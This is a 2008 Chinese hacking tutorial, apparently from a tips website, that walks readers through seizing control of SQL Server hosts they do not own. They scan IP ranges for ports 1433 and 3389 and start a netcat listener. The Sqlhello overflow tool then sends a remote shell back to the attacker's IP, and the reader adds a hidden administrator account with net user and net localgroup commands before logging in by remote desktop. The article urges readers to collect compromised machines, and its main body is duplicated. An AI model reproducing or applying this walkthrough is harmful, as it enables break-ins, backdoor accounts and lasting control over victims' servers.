黑客如何入侵裝有SQL數(shù)據(jù)庫(kù)的電腦主機(jī)
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 19:38:04 作者:佚名
我要評(píng)論

近些年來(lái),計(jì)算機(jī)的安全性能,曾突飛猛進(jìn)的上升勢(shì)頭。導(dǎo)致以前網(wǎng)絡(luò),遍地都是的弱口令肉雞,現(xiàn)在早已消失的不知去向。可見(jiàn)其安全的提升程度,難道菜鳥(niǎo)抓取肉雞成為了“天方夜潭”?當(dāng)然答案是否定的,具體如何獲取肉雞請(qǐng)看下文所示!
小提示:肉雞是指在網(wǎng)絡(luò)上,已經(jīng)
近些年來(lái),計(jì)算機(jī)的安全性能,曾突飛猛進(jìn)的上升勢(shì)頭。導(dǎo)致以前網(wǎng)絡(luò),遍地都是的弱口令肉雞,現(xiàn)在早已消失的不知去向??梢?jiàn)其安全的提升程度,難道菜鳥(niǎo)抓取肉雞成為了“天方夜潭”?當(dāng)然答案是否定的,具體如何獲取肉雞請(qǐng)看下文所示!
小提示:肉雞是指在網(wǎng)絡(luò)上,已經(jīng)被你成功入侵的主機(jī),并且這臺(tái)機(jī)器完全受控于入侵者的任意操作,如同本機(jī)操控一樣的直觀順手。
一、踩點(diǎn)掃描——尋找目標(biāo)
俗話說(shuō):知己知彼,百戰(zhàn)百勝!這里在網(wǎng)絡(luò)中攻破一臺(tái)主機(jī),也是同樣的道理,或者換句話說(shuō):擁有一款超強(qiáng)掃描的刺探工具,才是您能否走向入侵成功的關(guān)鍵。
首先筆者從網(wǎng)上下載大名鼎鼎的SuperScan端口掃描工具(下載地址:http://www.yezie.com/Down/list.aspx?id=109229),操作完畢后,雙擊解壓出來(lái)的“主程序”圖標(biāo),彈出SuperScan工具操作界面(如圖1)。然后在左邊“開(kāi)始IP”以及STOP(結(jié)束)IP標(biāo)簽處,輸入想要查找的肉雞IP網(wǎng)段,在選取掃描的服務(wù)。單擊右上角“端口列表設(shè)置”按鈕,進(jìn)入“自定義端口”窗體,在“端口”標(biāo)簽處,輸入1433的端口數(shù)字,單擊“增加”按鈕,編輯區(qū)就會(huì)出現(xiàn)紅色字體的1433端口,在雙擊其數(shù)字,前面會(huì)有一個(gè)"√"的標(biāo)志,證明該端口已經(jīng)添加完畢,然后在按照上一步添加端口的步驟,將3389端口也填入到其中。在單擊“保存”按鈕,選擇端口為端口列表,會(huì)順“原路”返回到主界面。在掃描類型內(nèi)選擇All selected port in list單選框,點(diǎn)擊“開(kāi)始”按鈕,檢測(cè)啟動(dòng)。稍等一會(huì)后,在所設(shè)立的網(wǎng)段中,符合要求的主機(jī),會(huì)立刻“浮現(xiàn)”在下方編輯區(qū)域內(nèi)。
圖 1
二、天羅地網(wǎng)——監(jiān)聽(tīng)端口
既然“柔弱”的主機(jī),都已被掃描器“撕破了臉皮揭曉”,接下來(lái)要做的就是布下“天羅地網(wǎng)”,等待那些含有漏洞的目標(biāo)主機(jī)“自投羅網(wǎng)”,布置所用的工具——瑞士軍刀NC監(jiān)聽(tīng)。
為了方便本文以下講解,筆者已經(jīng)將其下載到本地I盤符,然后單擊“開(kāi)始”菜單,選擇“運(yùn)行”選項(xiàng)。在出現(xiàn)的“打開(kāi)”標(biāo)簽處,輸入CMD字符命令,并且敲擊“回車”鍵,會(huì)立即彈出“命令行”式對(duì)話框。在光標(biāo)閃爍處敲入DOS跳轉(zhuǎn)命令,進(jìn)入到NC工具所在的目錄,開(kāi)始執(zhí)行該軟件所提供的監(jiān)聽(tīng)功能,這里輸入NC –v v –l –p 1987的命令回車,如果命令行下出現(xiàn)等待的“省略號(hào)”提示信息(如圖2),證明已經(jīng)成功,監(jiān)聽(tīng)本機(jī)1987端口。
圖 2
小提示:NC軟件里的-vv參數(shù)代表,得到更詳細(xì)的輸入監(jiān)聽(tīng)內(nèi)容。-l代表連接端口關(guān)閉后,仍然繼續(xù)監(jiān)聽(tīng)。-p進(jìn)行監(jiān)聽(tīng)本地端口,后跟數(shù)字就是所要監(jiān)聽(tīng)的端口號(hào)。
三、驅(qū)趕肉雞——進(jìn)入所布下的陷阱
等待肉雞上門,自然不是聰明的辦法,更不知道何時(shí),才能有主機(jī)訪問(wèn)到本地布下的“網(wǎng)罩”。所以要使用Sqlhello攻擊工具的功能,驅(qū)趕目標(biāo)機(jī)器強(qiáng)行“重招”,來(lái)加速其訪問(wèn)“陷阱”的效率。
此時(shí),將正在監(jiān)聽(tīng)的命令窗體,呈最下化模式,回到WINDOWS圖形化操作界面。然后在硬盤驅(qū)動(dòng)器中,找到筆者事先下載的Sqlhello溢出工具所在目錄,你會(huì)發(fā)現(xiàn)與以往工具目錄,不同的是多出一個(gè)1.BAT批處理文件,其實(shí)這是Sqlhello溢出工具的執(zhí)行臺(tái),在以“編輯”選項(xiàng)的形式打開(kāi)。輸入其格式為Sqlhello 目標(biāo)主機(jī)IP 1433 本機(jī)IP 監(jiān)聽(tīng)端口的命令(如圖3),單擊右上角“關(guān)閉”按鈕,保存其文件內(nèi)容結(jié)束。操作完畢后,再次雙擊1.BAT批處理文件,會(huì)快速的閃過(guò)DOS命令窗體,可見(jiàn)該批處理已經(jīng)操控著Sqlhello工具,開(kāi)始溢出攻擊了。然后回到還在監(jiān)聽(tīng)的NC命令窗體,等待的省略號(hào)已經(jīng)變?yōu)榱讼到y(tǒng)的SHELL,這也正是遠(yuǎn)程主機(jī)的命令控制臺(tái)。
圖 3
小提示:SHELL是操作系統(tǒng)的最外層,管理著你與操作系統(tǒng)交互、通訊、執(zhí)行等工作的操作,假設(shè)你已經(jīng)得到了對(duì)方的SHELL,也就代表著你擁有了與對(duì)方計(jì)算機(jī)直接溝通、下達(dá)命令的平臺(tái)。
在其命令行下輸入Net User Administrators Wenpeng 123456 /ADD的命令,就可以建立一個(gè)屬于自己名為“Wenpeng”,密碼是123456的普通帳戶。在將所建用戶的權(quán)限提升為管理員,敲入Net Localgroup Administrators wenpeng /add命令回車,即可提示命令成功完成的內(nèi)容。最后使用本機(jī)自帶的遠(yuǎn)程終端軟件,敲入剛才溢出的IP以及建立/提升的用戶,進(jìn)行“遠(yuǎn)程連接”登錄,稍等片刻后,屏幕會(huì)立即出現(xiàn)非常直觀的肉雞桌面(如圖4)。
圖 4
可見(jiàn)目前已被攻破的主機(jī),在讓筆者任由“擺步”的同時(shí),還可以像操作本機(jī)一樣得心應(yīng)手。相信這樣理想的肉雞,您一定不會(huì)錯(cuò)過(guò)。何不一同依照本文所提供的方法,來(lái)獲取自己“夢(mèng)寐以求”的肉雞呢?
小提示:肉雞是指在網(wǎng)絡(luò)上,已經(jīng)被你成功入侵的主機(jī),并且這臺(tái)機(jī)器完全受控于入侵者的任意操作,如同本機(jī)操控一樣的直觀順手。
一、踩點(diǎn)掃描——尋找目標(biāo)
俗話說(shuō):知己知彼,百戰(zhàn)百勝!這里在網(wǎng)絡(luò)中攻破一臺(tái)主機(jī),也是同樣的道理,或者換句話說(shuō):擁有一款超強(qiáng)掃描的刺探工具,才是您能否走向入侵成功的關(guān)鍵。
首先筆者從網(wǎng)上下載大名鼎鼎的SuperScan端口掃描工具(下載地址:http://www.yezie.com/Down/list.aspx?id=109229),操作完畢后,雙擊解壓出來(lái)的“主程序”圖標(biāo),彈出SuperScan工具操作界面(如圖1)。然后在左邊“開(kāi)始IP”以及STOP(結(jié)束)IP標(biāo)簽處,輸入想要查找的肉雞IP網(wǎng)段,在選取掃描的服務(wù)。單擊右上角“端口列表設(shè)置”按鈕,進(jìn)入“自定義端口”窗體,在“端口”標(biāo)簽處,輸入1433的端口數(shù)字,單擊“增加”按鈕,編輯區(qū)就會(huì)出現(xiàn)紅色字體的1433端口,在雙擊其數(shù)字,前面會(huì)有一個(gè)"√"的標(biāo)志,證明該端口已經(jīng)添加完畢,然后在按照上一步添加端口的步驟,將3389端口也填入到其中。在單擊“保存”按鈕,選擇端口為端口列表,會(huì)順“原路”返回到主界面。在掃描類型內(nèi)選擇All selected port in list單選框,點(diǎn)擊“開(kāi)始”按鈕,檢測(cè)啟動(dòng)。稍等一會(huì)后,在所設(shè)立的網(wǎng)段中,符合要求的主機(jī),會(huì)立刻“浮現(xiàn)”在下方編輯區(qū)域內(nèi)。

圖 1
二、天羅地網(wǎng)——監(jiān)聽(tīng)端口
既然“柔弱”的主機(jī),都已被掃描器“撕破了臉皮揭曉”,接下來(lái)要做的就是布下“天羅地網(wǎng)”,等待那些含有漏洞的目標(biāo)主機(jī)“自投羅網(wǎng)”,布置所用的工具——瑞士軍刀NC監(jiān)聽(tīng)。
為了方便本文以下講解,筆者已經(jīng)將其下載到本地I盤符,然后單擊“開(kāi)始”菜單,選擇“運(yùn)行”選項(xiàng)。在出現(xiàn)的“打開(kāi)”標(biāo)簽處,輸入CMD字符命令,并且敲擊“回車”鍵,會(huì)立即彈出“命令行”式對(duì)話框。在光標(biāo)閃爍處敲入DOS跳轉(zhuǎn)命令,進(jìn)入到NC工具所在的目錄,開(kāi)始執(zhí)行該軟件所提供的監(jiān)聽(tīng)功能,這里輸入NC –v v –l –p 1987的命令回車,如果命令行下出現(xiàn)等待的“省略號(hào)”提示信息(如圖2),證明已經(jīng)成功,監(jiān)聽(tīng)本機(jī)1987端口。

圖 2
小提示:NC軟件里的-vv參數(shù)代表,得到更詳細(xì)的輸入監(jiān)聽(tīng)內(nèi)容。-l代表連接端口關(guān)閉后,仍然繼續(xù)監(jiān)聽(tīng)。-p進(jìn)行監(jiān)聽(tīng)本地端口,后跟數(shù)字就是所要監(jiān)聽(tīng)的端口號(hào)。
三、驅(qū)趕肉雞——進(jìn)入所布下的陷阱
等待肉雞上門,自然不是聰明的辦法,更不知道何時(shí),才能有主機(jī)訪問(wèn)到本地布下的“網(wǎng)罩”。所以要使用Sqlhello攻擊工具的功能,驅(qū)趕目標(biāo)機(jī)器強(qiáng)行“重招”,來(lái)加速其訪問(wèn)“陷阱”的效率。
此時(shí),將正在監(jiān)聽(tīng)的命令窗體,呈最下化模式,回到WINDOWS圖形化操作界面。然后在硬盤驅(qū)動(dòng)器中,找到筆者事先下載的Sqlhello溢出工具所在目錄,你會(huì)發(fā)現(xiàn)與以往工具目錄,不同的是多出一個(gè)1.BAT批處理文件,其實(shí)這是Sqlhello溢出工具的執(zhí)行臺(tái),在以“編輯”選項(xiàng)的形式打開(kāi)。輸入其格式為Sqlhello 目標(biāo)主機(jī)IP 1433 本機(jī)IP 監(jiān)聽(tīng)端口的命令(如圖3),單擊右上角“關(guān)閉”按鈕,保存其文件內(nèi)容結(jié)束。操作完畢后,再次雙擊1.BAT批處理文件,會(huì)快速的閃過(guò)DOS命令窗體,可見(jiàn)該批處理已經(jīng)操控著Sqlhello工具,開(kāi)始溢出攻擊了。然后回到還在監(jiān)聽(tīng)的NC命令窗體,等待的省略號(hào)已經(jīng)變?yōu)榱讼到y(tǒng)的SHELL,這也正是遠(yuǎn)程主機(jī)的命令控制臺(tái)。

圖 3
小提示:SHELL是操作系統(tǒng)的最外層,管理著你與操作系統(tǒng)交互、通訊、執(zhí)行等工作的操作,假設(shè)你已經(jīng)得到了對(duì)方的SHELL,也就代表著你擁有了與對(duì)方計(jì)算機(jī)直接溝通、下達(dá)命令的平臺(tái)。
在其命令行下輸入Net User Administrators Wenpeng 123456 /ADD的命令,就可以建立一個(gè)屬于自己名為“Wenpeng”,密碼是123456的普通帳戶。在將所建用戶的權(quán)限提升為管理員,敲入Net Localgroup Administrators wenpeng /add命令回車,即可提示命令成功完成的內(nèi)容。最后使用本機(jī)自帶的遠(yuǎn)程終端軟件,敲入剛才溢出的IP以及建立/提升的用戶,進(jìn)行“遠(yuǎn)程連接”登錄,稍等片刻后,屏幕會(huì)立即出現(xiàn)非常直觀的肉雞桌面(如圖4)。

圖 4
可見(jiàn)目前已被攻破的主機(jī),在讓筆者任由“擺步”的同時(shí),還可以像操作本機(jī)一樣得心應(yīng)手。相信這樣理想的肉雞,您一定不會(huì)錯(cuò)過(guò)。何不一同依照本文所提供的方法,來(lái)獲取自己“夢(mèng)寐以求”的肉雞呢?
相關(guān)文章
- 前幾天看報(bào)紙說(shuō)一位女孩個(gè)人電腦被黑客入侵控制,把照片發(fā)到網(wǎng)上威脅女孩的事,聯(lián)想到最近網(wǎng)上這樣的事挺多的,就想給大家說(shuō)說(shuō)怎么防范2008-10-08
- 你的ADSL用戶名和密碼不安全 剛剛上網(wǎng)看了會(huì)兒新聞,和朋友聊了聊天。之后打游戲的時(shí)候,發(fā)現(xiàn)比平時(shí)要卡,不知道是什么原因,難道是網(wǎng)絡(luò)問(wèn)題嗎?不管它了。聽(tīng)同事說(shuō)美劇2008-10-08
- 從你這里真是學(xué)到不少東西呀,今天我去網(wǎng)吧和同事打了會(huì)兒游戲,我從來(lái)不在網(wǎng)吧上用QQ,總覺(jué)得網(wǎng)吧很危險(xiǎn),里面到全是木馬,我知道很多人能夠得到MM的QQ號(hào),他們是怎么弄的2008-10-08
- 本 文章無(wú)技術(shù)含量,只是提供一個(gè)思路,思路來(lái)源于前不久暴出的那個(gè)ewebeditor2.16版本的上傳漏洞。2009-10-11
黑客總結(jié)的實(shí)用的網(wǎng)站滲透步驟
本文是黑客們總結(jié)的比較實(shí)用的網(wǎng)站滲透的一些步驟2012-10-23你的網(wǎng)站為什么被黑?原因大部分是后門backdoor腳本
你的網(wǎng)站為什么被黑了?經(jīng)過(guò)網(wǎng)絡(luò)安全公司Sucuri的安全專家的調(diào)查,有大約68%的被黑網(wǎng)站存在著隱藏的后門backdoor腳本。這些后門腳本就是為入侵者提供的秘密通道,即使管理2016-05-23